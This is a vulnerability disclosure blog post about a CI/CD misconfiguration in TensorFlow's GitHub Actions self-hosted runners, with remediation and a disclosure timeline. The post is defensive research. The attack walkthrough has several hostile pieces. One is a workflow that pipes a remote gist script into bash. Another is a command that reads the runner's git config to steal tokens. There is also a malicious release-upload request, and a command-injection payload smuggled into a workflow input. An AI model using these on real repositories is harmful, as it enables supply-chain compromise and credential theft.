Introduction

With the recent rise and adoption of artificial intelligence technologies, open-source frameworks such as TensorFlow are prime targets for attackers seeking to conduct software supply chain attacks. Over the last several years, Praetorian engineers have become adept at performing highly complex attacks on GitHub Actions CI/CD environments, designing proprietary tools to aid their attacks, and presenting their research at ShmooCon and BSides SF 2023.

At ShmooCon 2023, Praetorian released Gato, an open-source tool for GitHub Actions pipeline enumeration and attack, with a particular focus on self-hosted GitHub Actions runners. We ran the tool on large organizations to discover vulnerable repositories, and Gato identified TensorFlow as potentially vulnerable to a poisoned pipeline execution attack.

As a result of our research, we were able to identify a series of CI/CD misconfigurations that an attacker could abuse to conduct a supply chain compromise of TensorFlow releases on GitHub and PyPi by compromising TensorFlow’s build agents via a malicious pull request. Praetorian disclosed this vulnerability to Google, and it was accepted as a critical ‘Supply chain compromise’ vulnerability.

In this blog, we will discuss our methodology for identifying the vulnerability, walk through the underlying issues that caused the bug, and explain the steps an attacker could take to compromise TensorFlow releases. We will conclude with TensorFlow’s remediation steps and our thoughts on the overall process.

TensorFlow Description

TensorFlow is “an end-to-end open-source platform for machine learning. It has a comprehensive, flexible ecosystem of tools, libraries, and community resources that lets researchers push the state-of-the-art in ML and developers easily build and deploy ML-powered applications.” TensorFlow was originally developed by researchers and engineers working within the Machine Intelligence team at Google Brain to conduct research in machine learning and neural networks. Currently, TensorFlow has 180,000 stars on GitHub and is used by popular tech companies such as Google, Lenovo, Intel, and Qualcomm.

Impact

Exploiting these vulnerabilities allows an external attacker to:

  • Upload malicious releases to the official TensorFlow GitHub repository
  • Gain RCE on a self-hosted GitHub runner
  • Retrieve a GitHub Personal Access Token (PAT) for the tensorflow-jenkins user

GitHub Actions Background

Before we dive into the exploit, let’s take a minute to understand what we attacked. TensorFlow, like thousands of other organizations, uses GitHub Actions for their CI/CD process. GitHub Actions allow the execution of code specified within workflows as part of the CI/CD process.

For example, let’s say TensorFlow wants to run a set of tests when a GitHub user submits a pull request. TensorFlow can define these tests in a yaml workflow file, used by GitHub Actions, and configure the workflow to run on the `pull_request` trigger. Now, whenever a user submits a pull request, the tests will execute on a runner. This way, repository maintainers don’t need to manually test everyone’s code before merging.
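
As a hedged illustration (the file, job, and script names below are ours, not TensorFlow’s), a minimal workflow of this kind might look like the following:

name: Run Tests
# Run this workflow whenever a pull request is opened or updated
on:
  pull_request:
jobs:
  tests:
    # Execute on a GitHub-hosted Ubuntu runner
    runs-on: ubuntu-latest
    steps:
      # Check out the code from the pull request
      - uses: actions/checkout@v4
      # Run the project's test suite (the script name is illustrative)
      - name: Run unit tests
        run: ./run_tests.sh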

GitHub Actions workflows execute on two types of build runners. The first type is GitHub-hosted runners, which GitHub maintains and hosts in its own environment. The second is self-hosted runners.

Self-Hosted Runners

Self-hosted runners are build agents hosted by end users running the Actions runner agent on their own infrastructure. As one would expect, securing and protecting the runners is the responsibility of end users, not GitHub. For this reason, GitHub recommends against using self-hosted runners on public repositories.

By default, when a self-hosted runner is attached to a repository or an organization runner group that a public repository has access to, any workflow running in that repository’s context can use that runner.

For workflows on default and feature branches, this isn’t an issue. Users must have write access to update branches within repositories. The problem is that this also applies to workflows from fork pull requests – this default setting allows any contributor to execute code on the self-hosted runner by submitting a malicious PR.

If the self-hosted runner is configured using the default steps, it will be a non-ephemeral self-hosted runner. This means that the malicious workflow can start a process in the background that will continue to run after the job completes, and modifications to files (such as programs on the path, etc.) will persist.
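
To make this concrete, here is a hedged sketch (our own example, not a TensorFlow workflow; the implant path is hypothetical) of a step that leaves a background process running after the job finishes on a non-ephemeral runner:

name: persistence-sketch
on: pull_request
jobs:
  persist:
    runs-on: [self-hosted, linux]
    steps:
      - name: background implant
        run: |
          # nohup detaches the process from the job so it keeps running after
          # the build completes on a non-ephemeral runner; output is discarded
          nohup /tmp/implant.sh >/dev/null 2>&1 &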

Identifying the Vulnerability

Identifying Self-Hosted Runners

The first step in identifying this vulnerability was confirming the use of self-hosted runners. To identify self-hosted runners, we ran Gato, a tool developed by Praetorian. Among other things, Gato can enumerate the existence of self-hosted runners within a repository by examining GitHub workflow files and run logs. Gato identified a persistent, self-hosted runner that ran ARM64 Linux CI builds. We looked at the TensorFlow repository to confirm the Gato output.

Gato Output

Confirming self-hosted runners in GitHub Actions logs.

Determining Workflow Approval Requirements

The second step was determining the workflow approval settings. The default setting for workflow execution from fork PRs is to require approval only for accounts that have not previously contributed to the repository. There is a stricter option that requires approval for all fork PRs, including those from previous contributors, so we set out to discover the status of this setting. By viewing the pull request (PR) history, we found several PRs from previous contributors that triggered `pull_request` workflows without requiring approval. This indicated that workflow approval was not required for fork PRs from previous contributors.

PR #61443 received no approvals, yet the ARM_CI workflow ran on `pull_request`.

Searching for Impact

Compromising self-hosted runners can have a wide range of impacts, from trivial to critical. We provide explicit steps to compromise the self-hosted runner below, but first, let’s understand TensorFlow’s use of GitHub Actions to determine the access an attacker would have if they compromised the self-hosted runner. By examining the workflow logs, we observed that self-hosted runners with the same name were used in multiple workflow runs. This meant the runner was non-ephemeral, so an attacker could persist on the runner even after their PR job finished by forking off their own process.

The “runner6” runner was used by several workflows. Additionally, this workflow contained a step that stopped old Docker containers, indicating the runner had executed previous jobs.

This particular runner was one of a handful of self-hosted runners in a TensorFlow runner group named `Default`. An attacker could use a malicious pull request to compromise any runner in this group, or all of them at once by applying a matrix strategy to `runs-on`. Hypothetically, let’s say an attacker compromised the `runner6` runner. The impact of runner compromise typically depends on the permission levels of the `GITHUB_TOKEN` assigned to subsequent builds, the branch protection settings in place for the repository, the network positioning of the build machine, and repository secrets.
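
As a hedged sketch of that fan-out (the runner names besides `runner6` are hypothetical), a matrix over runner names schedules one copy of the malicious job on each runner in the group:

name: fan-out-sketch
on: pull_request
jobs:
  fan-out:
    strategy:
      matrix:
        # One job is scheduled per entry; names other than runner6 are made up
        runner: [runner1, runner2, runner6]
    # Each matrix job targets a specific self-hosted runner by name or label
    runs-on: ${{ matrix.runner }}
    steps:
      - name: implant
        run: echo "Running on ${{ matrix.runner }}"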

GITHUB_TOKEN Permissions

Typically, a workflow needs to check out the repository to the runner’s filesystem, whether to run tests defined in the repository, commit changes, or even publish releases. To perform these operations, the workflow can use a `GITHUB_TOKEN`. `GITHUB_TOKEN` permissions can vary from read-only access to extensive write privileges over the repository. The important aspect is that if a workflow executes on a self-hosted runner and uses a `GITHUB_TOKEN`, then that token will be present on the runner for the duration of that build. Searching through the workflow logs, we found that the `arm-ci-extended-cpp.yml` workflow also ran on the self-hosted runner. The logs confirmed that this workflow used a `GITHUB_TOKEN` with extensive write permissions.
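
As a hedged sketch of this pattern (not TensorFlow’s actual workflow file), a job that checks out the repository on a self-hosted runner with a write-scoped token might look like this:

name: example-build
on: push
permissions:
  # Grants the job's GITHUB_TOKEN write access to repository contents,
  # which covers creating releases and pushing to unprotected branches
  contents: write
jobs:
  build:
    runs-on: [self-hosted, linux, ARM64]
    steps:
      # actions/checkout persists the GITHUB_TOKEN in the local git config by
      # default, which is why it can later be recovered from the runner's disk
      - uses: actions/checkout@v4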

This token would only be valid for the life of that particular build. However, there are techniques to extend the build length once you are on the runner. Because the `GITHUB_TOKEN` had the `contents: write` permission, it could upload releases to https://github.com/tensorflow/tensorflow/releases/. An attacker who compromised one of these `GITHUB_TOKEN`s could add their own files to the Release Assets. For example, they could upload an asset claiming to be a pre-compiled, ready-to-use binary and add a release note with instructions to download and run it. Any users who downloaded the binary would then be running the attacker’s code. If the current source code assets are not pinned to the release commit, the attacker could also overwrite those assets directly.

Branch Protection Settings

The `contents: write` permission also meant an attacker could use the token to push code directly to the TensorFlow repository. However, TensorFlow’s default branches were protected, so an attacker would need to smuggle their code into a feature branch and hope that it got merged before detection. It is possible to set an arbitrary commit author when making a Git commit, so an attacker could attempt to attribute a commit to the feature branch’s author in order to hide their actions.

Network Positioning

It is difficult to determine the network access of a runner from run logs. In general, self-hosted runners could have access to the organization’s internal network or cloud environments. We did not confirm if this was the case with TensorFlow.

Repository Secrets

The TensorFlow repository used GitHub secrets to allow the runners to access sensitive systems during the automated release process. We analyzed the workflow files to determine which secrets the repository used.

While investigating the `arm-cd.yml` workflow, we noticed that it used the `AWS_PYPI_ACCOUNT_TOKEN` to authenticate to PyPi before uploading TensorFlow pip wheels and that this workflow ran on the self-hosted runner. This meant an attacker who compromised the runner could also compromise this secret.

An attacker could also use the GITHUB_TOKEN’s permissions to compromise the `JENKINS_TOKEN` repository secret, even though this secret was not used within workflows that ran on the self-hosted runners.

Executing the Attack

Given the risk of disrupting Google systems and the prominence of TensorFlow, we opted not to execute this attack in the wild. However, these are the steps we would have taken to compromise TensorFlow releases.

1.   Fix a Typo

First, we’d need to become a contributor to the TensorFlow repository. Becoming a contributor to a popular repository is typically a trivial task. For example, we could find a typo in a README and then submit a PR with the fix. Once the PR was merged into the main branch, we’d be a contributor. As of this writing, TensorFlow has over 3,400 contributors.

2.   Implant the Runner

To take control of the runner, we would first fork the repository. In our fork, we’d remove all existing workflows that run on the `pull_request` trigger to minimize our presence in the workflow logs. Next, we’d add a new workflow file to deploy persistence on the build agent. Here is a workflow file we could use to retrieve a bash script and execute it on the self-hosted runner:

name: SH Runner POC
on:
  pull_request:
jobs:
  unit-tests:
    runs-on: [self-hosted, linux, ARM64]
    steps:
      - name: unit-tests
        continue-on-error: true
        run: |
          curl -sSfL https://gist.githubusercontent.com/ouruser/dummyval/shell.sh | bash

Our bash script, stored in a GitHub gist, could bootstrap any Command-and-Control (C2) system, but one approach we’ve had success with is installing our own self-hosted GitHub runner on the compromised runner and then using a C2 repository with a simple workflow to execute commands. This method helps our C2 payload evade EDR and network or firewall restrictions because it uses the same communication mechanisms as the legitimate runner.

Once we created our payload, we’d submit a draft PR from our TensorFlow fork. The draft status would prevent the change to the workflow yaml file from sending a review request to code owners. After receiving our C2 callback, we’d force-push the branch in the draft PR back to the original upstream commit. The following commands would remove the malicious commit, close the PR, and hide obvious indications of malicious activity.

git reset --soft HEAD~1
git push --force
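
As a hedged illustration of the C2 approach mentioned above (the repository, runner labels, and input names are hypothetical), the attacker-controlled C2 repository could carry a trivial dispatch workflow that runs arbitrary commands on the implanted runner:

name: C2 Task
on:
  workflow_dispatch:
    inputs:
      cmd:
        description: 'Command to run on the implanted runner'
        required: true
        type: string
jobs:
  task:
    # Targets the rogue runner we registered to our own repository
    runs-on: self-hosted
    steps:
      - name: run command
        run: ${{ github.event.inputs.cmd }}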

3.   Upload Release to GitHub

Once we were on the runner, we’d pivot to stealing secrets. We’d monitor the workflow logs to wait for a build to execute on the runner that was not from a fork PR. When that occurred, we’d run the following command to steal the `GITHUB_TOKEN` from the runner’s working directory:

find /home/ubuntu/actions-runner/_work -type f -name config | xargs cat

Using the GitHub token, we could execute the following API request to upload a malicious binary to a GitHub release:

curl -L \
-X POST \
-H "Accept: application/vnd.github+json" \
-H "Authorization: Bearer $STOLEN_TOKEN" \
-H "X-GitHub-Api-Version: 2022-11-28" \
-H "Content-Type: application/octet-stream" \
"https://uploads.github.com/repos/tensorflow/tensorflow/releases/:release_id:/assets?name=:malicious_release:" \
--data-binary "@:path_to_local_malicious_release:"

4.   Steal PyPi Credentials

To compromise PyPi credentials, we’d monitor workflow logs for the `arm-cd.yml` workflow to run on the compromised runner. While it was running, we’d monitor running processes or dump the runner’s memory to retrieve the PyPi token. We could then use these credentials to authenticate to PyPi and upload a malicious wheel.

5.   Steal Jenkins Token GitHub PAT

Lastly, we’d compromise a `GITHUB_TOKEN` and abuse it to steal the `JENKINS_TOKEN` secret. This secret was not used by workflows that ran on the self-hosted runners, but there was a way to steal it using the `GITHUB_TOKEN` and a `workflow_dispatch` event. The `JENKINS_TOKEN` is a GitHub PAT for the tensorflow-jenkins user (https://github.com/tensorflow-jenkins).

The `release-branch-cherrypick.yml` workflow uses the JENKINS_TOKEN secret and runs on `workflow_dispatch`. In order to steal this secret, we would need to execute code within this workflow run, and steal the token from the runner’s memory. The GITHUB_TOKEN cannot alter workflow files, even with full write permissions, so we would need to find a way to control the code executed by the workflow.

If we look at the workflow file, it contains two string input parameters:

name: Release Branch Cherrypick
on:
  workflow_dispatch:
    inputs:
      # We use this instead of the "run on branch" argument because GitHub looks
      # on that branch for a workflow.yml file, and we'd have to cherry-pick
      # this file into those branches.
      release_branch:
        description: 'Release branch name (e.g. r2.9)'
        required: true
        type: string
      git_commit:
        description: 'Git commit to cherry-pick'
        required: true
        type: string

The workflow also contained a run step:

- name: Get some helpful info for formatting
  id: cherrypick
  run: |
    git config --global user.name "TensorFlow Release Automation"
    git config --global user.email "jenkins@tensorflow.org"
    git fetch origin master
    git cherry-pick ${{ github.event.inputs.git_commit }}
    echo "SHORTSHA=$(git log -1 ${{ github.event.inputs.git_commit }} --format="%h")" >> "$GITHUB_OUTPUT"
    echo "TITLE=$(git log -1 ${{ github.event.inputs.git_commit }} --format="%s")" >> "$GITHUB_OUTPUT"

If you’ve read Long Live the Pwn Request: Hacking Microsoft GitHub Repositories and More, or are familiar with GitHub Actions injection, you might see where this is going. Since the `git_commit` value is passed directly into the script, it is possible to inject code into the run step.

From here, we would issue a dispatch event using GitHub’s REST API with an injection payload in the `git_commit` input. The payload could look like this:

Hacked;{curl,-sSfL,gist.githubusercontent.com/Path/To/Your/payload.sh}${IFS}|${IFS}bash;exit 0
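
Because `${{ }}` expressions are substituted as literal text before the step’s script runs, the run step would effectively contain the following once the input is interpolated (a hedged reconstruction; the gist path is still a placeholder):

run: |
  # The "Hacked" argument and the semicolon terminate the cherry-pick command,
  # while {curl,-sSfL,<url>} brace expansion and ${IFS} (the shell's field
  # separator) reassemble "curl -sSfL <url> | bash" without literal spaces
  git cherry-pick Hacked;{curl,-sSfL,gist.githubusercontent.com/Path/To/Your/payload.sh}${IFS}|${IFS}bash;exit 0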

The gist would contain code to steal the secret from the workflow. There are several known techniques to accomplish this, as documented by Karim Rahal in Leaking Secrets from GitHub Actions. Gato could then enumerate the PAT’s access and scopes to search for lateral movement opportunities.

Remediation

TensorFlow remediated these vulnerabilities by requiring approval for workflows submitted from all fork PRs, including the PRs of previous contributors. Additionally, TensorFlow changed the `GITHUB_TOKEN` permissions to read-only for workflows that ran on self-hosted runners.
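
In workflow terms, the second change corresponds to declaring read-only token permissions at the workflow or job level. A hedged sketch (not TensorFlow’s actual file):

name: ARM CI (illustrative)
on: pull_request
# The GITHUB_TOKEN issued to every job in this workflow is now read-only
permissions:
  contents: read
jobs:
  build:
    runs-on: [self-hosted, linux, ARM64]
    steps:
      - uses: actions/checkout@v4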

With these new controls in place, an attacker would have to smuggle malicious code into a PR and hope the repository maintainers don’t notice it when they approve the workflow. Even then, the impact of a self-hosted runner compromise would be limited, because the attacker couldn’t use the `GITHUB_TOKEN` to perform any write operations.

Submission Timeline

August 1st, 2023 – Report Submitted to Google VRP

August 2nd, 2023 – Report Triaged

August 14th, 2023 – Report Accepted

August 22nd, 2023 – Awarded as a “Supply Chain compromise” within Google’s “Standard OSS Projects” tier.

December 20th, 2023 – Marked as Fixed. This simply means that Google closed all tickets created as a result of this report; the attack path itself was mitigated in August when Google changed the PR workflow approval setting.

The vulnerability reporting process was very smooth, and Google’s security team was able to fully understand the vulnerability and its risks despite us not overtly exploiting it. This is not always the case with large organizations’ security disclosure programs, and we’d like to give Google a shout-out for scoping their VRP to include repository configurations and Actions workflows.

Mitigation Steps

In general, the best way to use self-hosted runners and protect the repository from these attacks is to take the following steps:

  1. Require approval to run workflows on the `pull_request` trigger for all outside fork PRs, even if the authors are previous contributors.
  2. Move the self-hosted runner group from the repository to an organization-level runner group (such as one dedicated to public repositories), configure the group to only run specific workflows that have already been committed to a protected branch, and then reference those workflows as reusable workflows (see the sketch after this list).
  3. If possible, ensure that only ephemeral self-hosted runners (1 build, 1 clean runner) are used for public repository builds.
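
As a hedged sketch of the reusable-workflow pattern in step 2 (organization, repository, and file names are illustrative), the caller workflow in the public repository only delegates to a workflow that was already reviewed and merged to a protected branch, and the runner group is configured to accept only that workflow:

# .github/workflows/arm-ci-caller.yml in the public repository (illustrative)
name: ARM CI (caller)
on: pull_request
jobs:
  arm-ci:
    # Delegate to a reusable workflow pinned to a protected branch of a
    # separate, maintainer-controlled repository
    uses: example-org/build-workflows/.github/workflows/arm-ci.yml@main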

Conclusion

Praetorian performs proactive vulnerability research to identify vulnerabilities in commonly used applications. As part of our research into TensorFlow, we identified a series of CI/CD misconfigurations that, when combined, could lead to the compromise of TensorFlow releases.

Similar CI/CD attacks are on the rise as more organizations automate their CI/CD processes. AI/ML companies are particularly vulnerable because many of their workflows require significant compute power that isn’t available in GitHub-hosted runners, hence the prevalence of self-hosted runners.

References